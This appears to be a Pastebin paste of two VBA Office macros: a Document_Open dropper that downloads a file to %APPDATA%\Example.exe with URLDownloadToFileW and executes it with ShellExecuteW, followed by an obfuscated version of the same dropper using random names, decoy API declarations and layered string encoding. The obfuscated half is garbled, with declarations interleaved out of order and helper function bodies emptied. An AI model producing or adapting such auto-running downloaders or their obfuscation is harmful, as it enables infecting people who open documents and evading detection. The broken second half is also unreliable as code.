Advertisement
Guest User

Untitled

a guest
Feb 9th, 2017
233
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 'macro original:
  2.  
  3. Option Explicit
  4.  
  5. Private Declare Function DispCallFunc Lib "oleaut32" ( _
  6.                          ByRef pvInstance As Any, _
  7.                          ByVal oVft As Long, _
  8.                          ByVal cc As Integer, _
  9.                          ByVal vtReturn As Integer, _
  10.                          ByVal cActuals As Long, _
  11.                          ByRef prgvt As Any, _
  12.                          ByRef prgpvarg As Any, _
  13.                          ByRef pvargResult As Variant) As Long
  14. Private Declare Function LoadLibrary Lib "kernel32.dll" _
  15.                          Alias "LoadLibraryW" ( _
  16.                          ByVal loLibfileName As Long) As Long
  17. Private Declare Function FreeLibrary Lib "kernel32" ( _
  18.                          ByVal hLibModule As Long) As Long
  19. Private Declare Function GetProcAddress Lib "kernel32.dll" ( _
  20.                          ByVal hModule As Long, _
  21.                          ByVal lpProcName As String) As Long
  22.  
  23. Private Function ApiCall(LibName As String, FuncName As String, ByVal RetType As VbVarType, ParamArray Params()) As Variant
  24.     Dim types()     As Integer  ' This is parameters types
  25.    Dim list()      As Long     ' This is pointers to parameters
  26.    Dim param()     As Variant
  27.     Dim pIndex      As Long
  28.     Dim ptrList     As Long
  29.     Dim ptrTypes    As Long
  30.     Dim resultCall  As Long
  31.     Dim hLib        As Long
  32.     Dim funcAddress As Long
  33.    
  34.     Const CC_STDCALL    As Long = 4
  35.    
  36.     hLib = LoadLibrary(StrPtr(LibName))
  37.     If hLib = 0 Then Err.Raise 5: Exit Function
  38.    
  39.     funcAddress = GetProcAddress(hLib, FuncName)
  40.     If funcAddress = 0 Then Err.Raise 5: Exit Function
  41.    
  42.     If LBound(Params) <= UBound(Params) Then
  43.        
  44.         ReDim list(LBound(Params) To UBound(Params))
  45.         ReDim types(LBound(Params) To UBound(Params))
  46.         ReDim param(LBound(Params) To UBound(Params))
  47.        
  48.         For pIndex = LBound(Params) To UBound(Params)
  49.             param(pIndex) = Params(pIndex)
  50.             list(pIndex) = VarPtr(param(pIndex))
  51.             types(pIndex) = VarType(param(pIndex))
  52.         Next
  53.        
  54.         ptrList = VarPtr(list(LBound(list)))
  55.         ptrTypes = VarPtr(types(LBound(types)))
  56.        
  57.     End If
  58.  
  59.     resultCall = DispCallFunc(ByVal 0, _
  60.                               funcAddress, _
  61.                               CC_STDCALL, _
  62.                               RetType, _
  63.                               UBound(Params) - LBound(Params) + 1, _
  64.                               ByVal ptrTypes, _
  65.                               ByVal ptrList, _
  66.                               ApiCall)
  67.              
  68.     FreeLibrary hLib
  69.    
  70.     If resultCall Then Err.Raise 5: Exit Function
  71.    
  72. End Function
  73.  
  74. Private Sub Document_Open()
  75. Call ApiCall("urlmon", "URLDownloadToFileW", vbLong, 0, StrPtr("url"), StrPtr(Environ$("APPDATA") & "\Example.exe"), 0, 0)
  76. Call ApiCall("shell32", "ShellExecuteW", vbLong, 0, StrPtr("Open"), StrPtr(Environ$("APPDATA") & "\Example.exe"), 0, 0, 1)
  77. End Sub
  78.  
  79.  
  80. 'MACRO OFUSCADA
  81. Option Explicit
  82. Private Declare Function aDigNCQMDRcKK Lib "version.dll" Alias "GetFileVersionInfoSizeA" (ByVal lptstrFilename As String, lpdwHandle As Long) As Long
  83. Private Declare Function ZhuVqUtKQLIC Lib "USER32" (ByVal hIcon As Long) As Long
  84. Private Declare Function pZjplxNOkmvSzdtagz Lib "USER32.DLL" Alias "GetClassNameA" (ByVal hWnd As Long, ByVal ClassName As String, ByVal ClassNameSize As Long) As Long
  85. Private Declare Function cYYQcMFMrRDT Lib "USER32" (ByVal hIcon As Long) As Long
  86. Private Declare Function RqTyi Lib "winmm.dll" (ByVal uPeriod As Long) As Long
  87. Private Declare Function ndTisbbNAcyKZGYJNn Lib "olepro32.dll" (ByVal OLE_COLOR As Long, ByVal hPalette As Long, lpColorRef As Long) As Long
  88. Private Declare Function SliFbzFBNQfACLVQtJcw Lib "USER32" (ByVal hCursor As Long) As Long
  89. Private Declare Function zfoonsdVdHUTknqi Lib "USER32" Alias "SetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
  90. Private Declare Function DispCallFunc Lib "oleaut32" ( _
  91. Private Declare Function OyhjDglyIerfQsONpQo Lib "USER32" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal hIcon As Long) As Long
  92. Private Declare Function EepjBz Lib "gdi32" (ByVal hDC As Long) As Long
  93. Private Declare Function PIEPhvQEOm Lib "USER32.DLL" (ByVal hWnd As Long) As Long
  94. Private Declare Function LsMRaPvEFDIgmtYl Lib "WINMM.DLL" Alias "mmioInstallIOProcA" (ByVal fccIOProc As Long, ByVal pIOProc As Long, ByVal dwFlags As Long) As Long
  95. Private Declare Function DGyQmfPxzTwBO Lib "USER32" (ByVal hWnd As Long, lpRect As Long) As Long
  96. Private Declare Function HhhIQeFaEdu Lib "USER32" (ByVal hCursor As Long) As Long
  97.                          ByRef pvInstance As Any, _
  98.                          ByVal PLmhhfl3V4EaScgj9Dc As Long, _
  99.                          ByVal ZBnMApGSyxi2yZev As Integer, _
  100.                          ByVal hdiMyvoKG7x183 As Integer, _
  101.                          ByVal CTjkwHBatPdAthT3 As Long, _
  102.                          ByRef d8QIQqGFY3 As Any, _
  103.                          ByRef jvNElZ2rZ4 As Any, _
  104.                          ByRef FdtdXuUTq4p8dIdrjF As Variant) As Long
  105. Private Declare Function BYHSZUgxMTVfCxbdJP Lib "olepro32.dll" (ByRef PicDesc As Any, ByRef RefIID As Long, ByVal fPictureOwnsHandle As Long, ByRef IPic As long) As Long
  106. Private Declare Function gLHHFKwCJb Lib "USER32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal strText As String) As Long
  107. Private Declare Function QGJBaDigNCQMD Lib "USER32" Alias "LoadCursorA" (ByVal hLib As Long, ByVal lngCursorID As Long) As Long
  108. Private Declare Function KKxxZ Lib "GDI32.DLL" (ByVal hDC As Long, ByVal nIndex As Long) As Long
  109. Private Declare Function VqUtKQLICUR Lib "USER32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal strText As String, ByVal TextLength As Long) As Long
  110. Private Declare Function jplxNOkmvSzdtagzHwcY Lib "WINMM.DLL" Alias "mixerGetLineControlsA" (ByVal hMixerObj As Long, pMixerLc As long, ByVal fdwControls As Long) As Long
  111. Private Declare Function LoadLibrary Lib "kernel32.dll" _
  112. Private Declare Function cMFMrRDTQaRqTyieSndT Lib "winmm.dll" (ByVal uPeriod As Long) As Long
  113. Private Declare Function bbNAcyKZGYNncZSliFbzFBNQfA Lib "USER32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal strText As String) As Long
  114. Private Declare Function VQtJcwPJzfoonsdV Lib "USER32" Alias "LoadIconA" (ByVal hLib As Long, ByVal lngIconID As Long) As Long
  115. Private Declare Function UTknqiGVOyhjDgl Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  116. Private Declare Function erfQsONpQoaeEep Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
  117. Private Declare Function zVrPIEPhvQEOm Lib "USER32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
  118. Private Declare Function LsMRaPvEFDIgmtYlADGyQmfP Lib "WINMM.DLL" Alias "mmioInstallIOProcA" (ByVal fccIOProc As Long, ByVal pIOProc As Long, ByVal dwFlags As Long) As Long
  119. Private Declare Function TwBOLuHhhIQeF Lib "USER32" (ByVal hIcon As Long) As Long
  120.                          Alias "LoadLibraryW" ( _
  121.                          ByVal loLibfileName As Long) As Long
  122. Private Declare Function vGASBYHSZUgxMTVfCxb Lib "gdi32" (ByVal hMetaFile As Long) As Long
  123. Private Declare Function PjrgLHHFKwCJbBA Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
  124. Private Declare Function TLkNsqYMhYOcmVUIIj Lib "USER32" (ByVal hCursor As Long) As Long
  125. Private Declare Function hAgDViVTNgdzjt Lib "gdi32" (ByVal hColorSpace As Long) As Long
  126. Private Declare Function HZavwFdKoDk Lib "olepro32.dll" (ByRef PicDesc As Any, ByRef RefIID As Long, ByVal fPictureOwnsHandle As Long, ByRef IPic As long) As Long
  127. Private Declare Function RHnijhmQPQBcNeik Lib "WINMM.DLL" (ByRef phMixer As Long, ByVal uMxId As Long, ByVal dwCallback As Long, ByVal dwInstance As Long, ByVal fdwOpen As Long) As Long
  128. Private Declare Function FreeLibrary Lib "kernel32" ( _
  129. Private Declare Function eItodxofsDmlZ Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
  130. Private Declare Function IUjQiTYy Lib "gdi32" (ByVal hDC As Long) As Long
  131. Private Declare Function ewtPmKPM Lib "WINMM.DLL" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
  132. Private Declare Function qLMVg Lib "winmm.dll" (ByVal uPeriod As Long) As Long
  133. Private Declare Function TnGaUJpyzxCngo Lib "gdi32" (ByVal hDC As Long) As Long
  134. Private Declare Function euyAsR Lib "GDI32.DLL" (ByVal hDC As Long, ByVal nIndex As Long) As Long
  135. Private Declare Function JrtNqvJToBpcCZYzhylp Lib "WINMM.DLL" Alias "mmioInstallIOProcA" (ByVal fccIOProc As Long, ByVal pIOProc As Long, ByVal dwFlags As Long) As Long
  136. Private Declare Function AuMJgCbSO Lib "olepro32.dll" (ByVal OLE_COLOR As Long, ByVal hPalette As Long, lpColorRef As Long) As Long
  137.                          ByVal hLibModule As Long) As Long
  138. Private Declare Function ZwrUQDQdlaFOPNSqx Lib "USER32" (ByVal hCursor As Long) As Long
  139. Private Declare Function vuKORIi Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  140. Private Declare Function aHJfHLaVES Lib "USER32" (ByVal hIcon As Long) As Long
  141. Private Declare Function ScoQkPnFfF Lib "gdi32" (ByVal hColorSpace As Long) As Long
  142. Private Declare Function dLjSdjfrHQegpMHl Lib "USER32" Alias "RegisterWindowMessageA" (ByVal LPString As String) As Long
  143. Private Declare Function atBrQRRQVGNUlLLbQTL Lib "USER32" (ByVal hWnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long
  144. Private Declare Function GetProcAddress Lib "kernel32.dll" ( _
  145. Private Declare Function sqYMhYOcmVUIIjsEh Lib "USER32" (ByVal hWnd As Long, lpRect As Long) As Long
  146. Private Declare Function DViVTNdzjtzv Lib "USER32" Alias "LoadBitmapA" (ByVal hInstance As Long, ByVal lngBitmapID As Long) As Long
  147. Private Declare Function avwFdKoDkqJRHnijhmQP Lib "USER32" (ByVal hIcon As Long) As Long
  148. Private Declare Function cNeikcBeItodx Lib "winmm.dll" (ByVal uPeriod As Long) As Long
  149. Private Declare Function sDmlZK Lib "WINMM.DLL" (ByVal hMixer As Long) As Long
  150. Private Declare Function UjQiTYymkewtPmK Lib "WINMM.DLL" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
  151. Private Declare Function YbqLMVgbETnGaUJp Lib "USER32" Alias "RegisterWindowMessageA" (ByVal LPString As String) As Long
  152.                          ByVal hModule As Long, _
  153.                          ByVal QF9ZV9tLaV7z As String) As Long
  154. Private Function y4H5bl8KVW(LibName As String, FuncName As String, ByVal RetType As VbVarType, ParamArray Params()) As Variant
  155.     Dim types()     As Integer  ' This is parameters types
  156.    Dim list()      As Long     ' This is pointers to parameters
  157.    Dim param()     As Variant
  158.     Dim pIndex      As Long
  159.     Dim ptrList     As Long
  160.     Dim ptrTypes    As Long
  161.     Dim resultCall  As Long
  162.     Dim hLib        As Long
  163.     Dim funcAddress As Long
  164.  
  165.     If hLib = 0 Then Err.Raise 5: Exit Function
  166.  
  167.     If funcAddress = 0 Then Err.Raise 5: Exit Function
  168.     If LBound(Params) <= UBound(Params) Then
  169.         ReDim list(LBound(Params) To UBound(Params))
  170.         ReDim types(LBound(Params) To UBound(Params))
  171.         ReDim param(LBound(Params) To UBound(Params))
  172.         For pIndex = LBound(Params) To UBound(Params)
  173.  
  174.         Next
  175.  
  176.     End If
  177.     resultCall = DispCallFunc(ByVal 0, _
  178.                               funcAddress, _
  179.                               CC_STDCALL, _
  180.                               RetType, _
  181.                               UBound(Params) - LBound(Params) + 1, _
  182.                               ByVal ptrTypes, _
  183.                               ByVal ptrList, _
  184.                               y4H5bl8KVW)
  185.  
  186.     If resultCall Then Err.Raise 5: Exit Function
  187. End Function
  188. Private Sub Document_Open()
  189. Call y4H5bl8KVW(iIQYzON6be4y(StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("ss+UEhQQFhUYGRop"),Xpr4czIw82317PX5pV("TmJMMTJ3QzNpVGdiMnhZ")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("g29pZJNTeIhmV3h8mJyT"),Xpr4czIw82317PX5pV("bEh6ZVBZRHRZNlByRURJ"))))),StrReverse(StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("oOE="),Xpr4czIw82317PX5pV("bEFlWDNuY204ekJuSWE4")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("sce62q7fm8Ox1bXd57Hi"),Xpr4czIw82317PX5pV("eHdZY0hSTXdHaEd5R2Y4"))))))), iIQYzON6be4y(StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("wOz7arCcnp2hs6KjprGls6evqqusrq6usMCys7XBuLi6x7zM"),Xpr4czIw82317PX5pV("SlcxclJ3VTcyQzNFUjhO")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("o4p/qqqNe4WhkIauf6Gt"),Xpr4czIw82317PX5pV("bkJPZ2NiS0VFZURoZHFE"))))),StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("hKo="),Xpr4czIw82317PX5pV("UG1sMzlFdDBBSXAzMFZ6")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("MwNAOzZBDg5SJkgONRIU"),Xpr4czIw82317PX5pV("REVzN0ZwYmpjRTlBOUly")))))), vbLong, 0, StrPtr(iIQYzON6be4y(StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("wcHZ+bs+"),Xpr4czIw82317PX5pV("VG5YYjFHMGtZV2dQU2NO")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("xJKjtdHU08WY1MWxr564"),Xpr4czIw82317PX5pV("UlI3RmJDMnlTSENJMkZE"))))),StrReverse(StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("H8I="),Xpr4czIw82317PX5pV("aWY0d3E4N3g5VmFuUzlz")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("xcqU2rnbtdHgvpqzsMPV"),Xpr4czIw82317PX5pV("V2o0UVRtNE15YXF6VGpP")))))))), StrPtr(Environ$(iIQYzON6be4y(StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("n0YUvHX5+AT7+v38/gQ="),Xpr4czIw82317PX5pV("UG9XSTdVMVZvR2I5TnUx")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("1bHOztW9xMnjysPiysOp"),Xpr4czIw82317PX5pV("STg0REFGTk9keTJBeksx"))))),StrReverse(StrReverse(StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("uVY="),Xpr4czIw82317PX5pV("V3IxRjN6WGV2NTU0eERO")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("mJ7JtYSlxaSrzYqdoK7D"),Xpr4czIw82317PX5pV("elVrdFhkMFRHcnBKY1Yw"))))))))) & iIQYzON6be4y(StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("/HQQ1NDbzdPS39XR19fZ1trc3fDg6+Dd"),Xpr4czIw82317PX5pV("dEd5em1uaGU4M0Rsd1lP")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("ZT1uPHJxMU1wcnF0UFhb"),Xpr4czIw82317PX5pV("SDJlUVJVcTh6Z2VyUjM1"))))),StrReverse(StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("0XM="),Xpr4czIw82317PX5pV("U0s0Z2pOY2wzVlhOSGNM")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("roqJvbawvqR9v6KHkp6l"),Xpr4czIw82317PX5pV("cmVxTVNrZ2dMV01RVTRS")))))))), 0, 0)
  190. Call y4H5bl8KVW(iIQYzON6be4y(StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("O/O4/M6nkI2Pn5GklJo="),Xpr4czIw82317PX5pV("eTBhZkxHdnRJYzRJb2Jm")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("npyXpqjNyr7Mo5XIorfG"),Xpr4czIw82317PX5pV("bHpUS1VEcDlZUlBVWGpz"))))),StrReverse(StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("oOE="),Xpr4czIw82317PX5pV("bEFlWDNuY204ekJuSWE4")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("sce62q7fm8Ox1bXd57Hi"),Xpr4czIw82317PX5pV("eHdZY0hSTXdHaEd5R2Y4"))))))), iIQYzON6be4y(StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("qEQDU3amJislJycvKjctMy4sMC4xOTNBODc="),Xpr4czIw82317PX5pV("ZkVhNDVrb01hUVdiMjlx")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("jpV1naOFiaeEZ2qBqqeJ"),Xpr4czIw82317PX5pV("RndjNEhjWnN6U3RLRTJX"))))),StrReverse(StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("H8I="),Xpr4czIw82317PX5pV("aWY0d3E4N3g5VmFuUzlz")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("xcqU2rnbtdHgvpqzsMPV"),Xpr4czIw82317PX5pV("V2o0UVRtNE15YXF6VGpP"))))))), vbLong, 0, StrPtr(iIQYzON6be4y(StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("lTtHFYmIi4k="),Xpr4czIw82317PX5pV("c01va2FRTE9hTmhqSGUz")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("cmdJaW96VE9bdV5LaX9K"),Xpr4czIw82317PX5pV("ckh1UmJPbU5YNDg3ZUdh"))))),StrReverse(StrReverse(StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("uVY="),Xpr4czIw82317PX5pV("V3IxRjN6WGV2NTU0eERO")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("mJ7JtYSlxaSrzYqdoK7D"),Xpr4czIw82317PX5pV("elVrdFhkMFRHcnBKY1Yw"))))))))), StrPtr(Environ$(iIQYzON6be4y(StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("n0YUvHX5+AT7+v38/gQ="),Xpr4czIw82317PX5pV("UG9XSTdVMVZvR2I5TnUx")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("1bHOztW9xMnjysPiysOp"),Xpr4czIw82317PX5pV("STg0REFGTk9keTJBeksx"))))),StrReverse(StrReverse(StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("uVY="),Xpr4czIw82317PX5pV("V3IxRjN6WGV2NTU0eERO")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("mJ7JtYSlxaSrzYqdoK7D"),Xpr4czIw82317PX5pV("elVrdFhkMFRHcnBKY1Yw"))))))))) & iIQYzON6be4y(StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("/HQQ1NDbzdPS39XR19fZ1trc3fDg6+Dd"),Xpr4czIw82317PX5pV("dEd5em1uaGU4M0Rsd1lP")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("ZT1uPHJxMU1wcnF0UFhb"),Xpr4czIw82317PX5pV("SDJlUVJVcTh6Z2VyUjM1"))))),StrReverse(StrReverse(jInqOmsIEk(E4BL0xVwZk(eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("0XM="),Xpr4czIw82317PX5pV("U0s0Z2pOY2wzVlhOSGNM")),eOH3JaQ3a6jEV56h(Xpr4czIw82317PX5pV("roqJvbawvqR9v6KHkp6l"),Xpr4czIw82317PX5pV("cmVxTVNrZ2dMV01RVTRS")))))))), 0, 0, 1)
  191. End Sub
  192. Public Function iIQYzON6be4y(strInput As String, second As Integer)
  193.     Dim first As Integer
  194.     For first = 1 To Len(strInput)
  195.  
  196.     Next first
  197.  
  198. End Function
  199. Public Function jInqOmsIEk(ByVal strData As String)
  200. Dim second As Long, CryptString As String, tmpChar As String
  201.     On Local Error Resume Next
  202.     For second = 1 To Len(strData) Step 2
  203.  
  204.     Next second
  205.  
  206. End Function
  207. Public Function E4BL0xVwZk(ByVal Data As String, ByVal Password As String) As String
  208. On Error Resume Next
  209. Dim first(0 To 255) As Integer, second As Integer, third As Long, fourth() As Byte
  210.  
  211. For second = 0 To 255
  212.  
  213. Next second
  214.  
  215. For second = 0 To Len(Data)
  216.  
  217. Next second
  218.  
  219. End Function
  220. Public Function eOH3JaQ3a6jEV56h(tSource As String, tKey As String) As String
  221.     Dim iPassword As Integer
  222.     Dim iCrypt As Integer
  223.     Dim X As Integer
  224.     For X = 1 To Len(tKey)
  225.  
  226.     Next X
  227.     For X = 1 To Len(tSource)
  228.  
  229.         Do Until iCrypt > 0
  230.  
  231.         Loop
  232.  
  233.     Next X
  234. End Function
  235. Public Function Xpr4czIw82317PX5pV(sString As String) As String
  236.     Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
  237.     Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
  238.     Dim lTemp As Long
  239.  
  240.     If lTemp Then Exit Function
  241.     If InStrRev(sString, "==") Then
  242.  
  243.     ElseIf InStrRev(sString, "=") Then
  244.  
  245.     End If
  246.     For lTemp = 0 To 255
  247.         Select Case lTemp
  248.             Case 65 To 90
  249.  
  250.             Case 97 To 122
  251.  
  252.             Case 48 To 57
  253.  
  254.             Case 43
  255.  
  256.             Case 47
  257.  
  258.         End Select
  259.     Next lTemp
  260.     For lTemp = 0 To 63
  261.  
  262.     Next lTemp
  263.  
  264.     ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)
  265.     For lChar = 0 To UBound(bIn) Step 4
  266.         lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
  267.                 lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))
  268.  
  269.     Next lChar
  270.  
  271.     If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)
  272.  
  273. End Function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement